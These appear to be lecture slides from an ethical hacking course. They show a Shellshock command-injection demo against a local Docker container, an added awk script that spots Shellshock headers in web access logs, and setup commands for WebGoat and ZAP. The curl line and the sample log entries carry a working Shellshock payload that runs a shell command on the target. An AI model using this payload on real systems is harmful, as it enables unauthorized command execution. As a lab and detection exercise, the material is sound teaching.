IT 4510: Ethical Hacking

Injections

Dr Joe Francom

Command Injection

  • Shellshock
  • Example:
    • docker run -d --rm -p 8888:80 joelongtoe/shellshock-example
    • curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/ls /' http://127.0.0.1:8888/cgi-bin/welcome.sh
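    • You can view the contents of that welcome script, which lives at /usr/lib/cgi-bin/welcome.sh inside the container, for example with: docker exec pensive_mendeleev /bin/cat /usr/lib/cgi-bin/welcome.sh (pensive_mendeleev is the name Docker auto-assigned to the container here; use the name shown by docker ps)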
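
The defender's view of the request above, as an added example that is not part of the original slides: the Shellshock trigger is a header value that begins with `() {`, so it is visible in web access logs. The function names, the Apache-style combined log format and the sample log lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Constructed sample access log in combined log format (not from the slides).
# Escaped quotes (\") inside a logged header value are kept as the server
# would write them.
sample_log() {
cat <<'EOF'
127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/welcome.sh HTTP/1.1" 200 120 "-" "curl/8.5.0"
127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/welcome.sh HTTP/1.1" 200 312 "-" "() { :;}; echo \"Content-Type: text/plain\"; echo; /bin/ls /"
127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 512 "() { :; }; echo test" "Mozilla/5.0"
127.0.0.1 - - [01/Jan/2024:10:00:12 +0000] "GET /docs/foo() HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64)"
EOF
}

# Hypothetical helper: print "client<TAB>header<TAB>request" for every log
# line whose Referer or User-Agent value starts with the bash
# function-definition prefix "() {". Reads the files given as arguments,
# or stdin when there are none.
find_shellshock() {
    awk -F'"' '
        # Replace escaped quotes so they do not shift the quote-delimited
        # fields; changing $0 makes awk split the fields again.
        { gsub(/\\"/, "\047") }
        {
            split($1, pre, " ")          # pre[1] is the client address
            # $2 = request line, $4 = Referer, $6 = User-Agent
            if (index($4, "() {") == 1) print pre[1] "\t" "referer" "\t" $2
            if (index($6, "() {") == 1) print pre[1] "\t" "user-agent" "\t" $2
        }
    ' "$@"
}

# Stand-alone run over the constructed sample.
sample_log | find_shellshock
```

Only values that start with `() {` are reported, so the `foo()` in the last sample request path and the parenthesised text in a normal browser User-Agent are not flagged.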

SQL Injection

Zap and Goat

  • docker run --rm -d -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=America/Boise webgoat/goatandwolf
  • sudo apt install zaproxy